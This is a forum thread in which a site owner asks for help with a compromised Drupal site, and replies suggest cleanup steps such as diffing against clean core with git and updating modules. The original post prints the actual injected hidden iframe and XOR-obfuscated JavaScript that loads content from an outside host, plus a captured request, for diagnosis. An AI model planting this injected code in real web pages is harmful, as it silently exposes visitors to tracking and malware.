Hi,
I'm working on upgrading a Drupal site for a friend that's being hosted on shared Bluehost (eek) server. I recently checked the site and some nasty looking iFrames have been injected into the very top of the page.
The iFrames aren't rendering anything but it's very worrying nonetheless.
I've tried googling it - which led to this:
http://research.zscaler.com/2015/09/compromised-wordpress-campaign-spywa...
which appears to describe the exact exploit i'm seeing on the site, but doesn't yet provide any fix.
The exploited site is here (WARNING - VISIT AT YOUR OWN RISK): http://dayalssports[.]com/
Perhaps safer to just view source view-source:http://dayalssports.com/
The article above suggests that infected Wordpress sites will cause the user's browser to potentially try to install some malware for advertising etc, except this site is Drupal of course - but not sure if that makes any difference.
Here's a sample of the injected iFrames:
<iframe width="0" height="0" src="http://kfc.i.illuminationes.com/snitch?default_keyword=Dayals%20Sports&referrer=&se_referrer=&source=dayalssports.com"><html><head></head><body><pre style="word-wrap: break-word; white-space: pre-wrap;"></pre></body></html></iframe>
and the injected javascript:
<script type="text/javascript">var a="'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;
'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;t
cp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02f
mawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1
F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00ida,'00'02)'02'00k,k'00'02)'02'00nn'00'02)'02'00woklcv'00'02)'02'00kmlg'00'02)'02
'00q,a'00'02)'
02'00mo'00'02)'02'00 qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'0
0'02)'02fgdcw
nv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02
'00gd'00'02)'
02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02j
mqv'1@'2C'2;f mawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++) {b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script>and it's making a whole bunch of network requests on each page load: e.g:
GET /snitch?default_keyword=Dayals%20Sports&referrer=&se_referrer=&source=dayalssports.com HTTP/1.1
Host: kfc.i.illuminationes.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Referer: http://dayalssports[.]com/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: bss=KC0g_y0LqDH8V81QT_JAAdnvuFVJMy first priority is of course figuring out how this has happened and removing the exploit, and then patching whatever it is that has let this happen. But i've very little experience dealing with this kind of issue so looking for any advice that's out there!
Some further information:
There are some other drupal sites on the same server that are also effected, but in a different way. The front ends are not effected but instead when loading up any administration pages e.g. /admin/structure/block, it's also making requests out to the same http://kfc.i.illuminationes[.]com/snitch URL, which severly stalls the page load time. This includes an almost completely fresh install of Drupal - which is even more worrying.
Any help or advice much appreciated.
Thanks.
Comments
Regarding to your description
Regarding to your description and after a quick search, I'll have a look in your friend's computer and yours cirst to see if you're not infected and after that, clean your server. Look on this page https://wordpress.org/support/topic/js-injection-after-wp as people seems to have the same problem as you.
Julien Didelet
Founder
Weblaa.com
I would like to suggest a
I would like to suggest a Drupal cleanup procedure as below:
drupal_dirty/and database, and save to somewhere else safedrupal_clean/rsync -av drupal_clean/ drupal_dirtycd drupal_clean; git init; git add --all .; git commit -am 'Initialize with clean Drupal core'for this clean Drupal corersync -av drupal_dirty/ drupal_cleancd drupal_clean; git statusand keep checking those changed files, andgit addthose safe filesgit statusandgit adduntil you able to figure out which files injected by hackerMoreover, if you can update the host OS packages to latest stable version just do so, too.
Edison Wong
CEO, Co-founder
PantaRei Design Limited
Thanks for the
Thanks for the suggestions!
I've done full updates of core and modules and that seemed to have made the injected code go away, but will keep searching for the initial vulnerability.
Cheers.
Good news that update core
Good news that update core and modules solve the problem ;-)
BTW strongly recommend to use GIT to housekeep your source code so always able to compare and rollback whenever required :-)
Edison Wong
CEO, Co-founder
PantaRei Design Limited
Yes indeed, need to get into
Yes indeed, need to get into the git habit!